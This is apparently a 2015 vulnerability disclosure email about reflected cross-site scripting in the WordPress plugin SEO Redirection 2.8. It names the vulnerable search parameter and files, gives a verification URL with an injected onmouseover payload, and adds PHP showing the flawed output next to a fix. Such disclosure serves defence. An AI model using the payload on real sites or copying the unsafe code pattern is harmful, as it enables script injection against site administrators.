Subject: Cross-Site Scripting (XSS) in SEO Redirection 2.8
Date: Fri, 21 Aug 2015 09:54:32 +0200

Hello,

Plugin: SEO Redirection 2.8 https://wordpress.org/plugins/seo-redirection/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code through the page, and the request has no CSRF protection.

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=[xss]
Vulnerable parameter: search

Example PHP callstack:
/seo-redirection/options/option_page_post_redirection_list.php:46

Verification:
http://localhost/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E


Identical XSS issues are also present in:

option_page_404.php (param search) /seo-redirection/options/option_page_404.php:51
option_page_history.php (param search) /seo-redirection/options/option_page_404.php:43
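The following is an added illustration, not code from the SEO Redirection plugin: a hypothetical admin search box that echoes the "search" parameter into an attribute the way the advisory describes, next to the WordPress-idiomatic fix (capability check, nonce check for the missing CSRF protection, sanitisation on input and esc_attr() on output). The function names sr_search_box_unsafe and sr_search_box_safe and the nonce action "sr_search" are assumptions; the WordPress functions used are real core APIs.

```php
<?php
// Added example, not the plugin's code. Function names and the nonce action are hypothetical.

// BEFORE (hypothetical): the raw GET value lands inside a quoted attribute, so the
// advisory's verification payload  " onmouseover=alert(1) >  closes the value and
// appends an event handler to the element.
function sr_search_box_unsafe() {
    $search = isset( $_GET['search'] ) ? $_GET['search'] : '';
    echo '<input type="text" name="search" value="' . $search . '">';
}

// AFTER: only users allowed to manage options may reach the handler, the request must
// carry a valid nonce (this is the CSRF protection the advisory notes is absent), the
// value is sanitised when read and escaped for the attribute context when written.
function sr_search_box_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $search = '';
    if ( isset( $_GET['search'] ) ) {
        // For a GET form the nonce is sent as the _wpnonce query argument;
        // check_admin_referer() stops the request if it is missing or invalid.
        check_admin_referer( 'sr_search', '_wpnonce' );
        $search = sanitize_text_field( wp_unslash( $_GET['search'] ) );
    }
    echo '<form method="get" action="' . esc_url( admin_url( 'options-general.php' ) ) . '">';
    echo '<input type="hidden" name="page" value="seo-redirection.php">';
    echo '<input type="hidden" name="tab" value="posts">';
    wp_nonce_field( 'sr_search', '_wpnonce' );
    // esc_attr() encodes the double quote as &quot;, so a value such as the advisory's
    // payload stays inside the attribute instead of starting a new one.
    echo '<input type="text" name="search" value="' . esc_attr( $search ) . '">';
    echo '<input type="submit" value="Search">';
    echo '</form>';
}
```

Because the nonce check runs before the value is used, an externally crafted link to the search URL no longer executes the handler on an administrator's behalf.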


--
Regards,
Marcin Probola,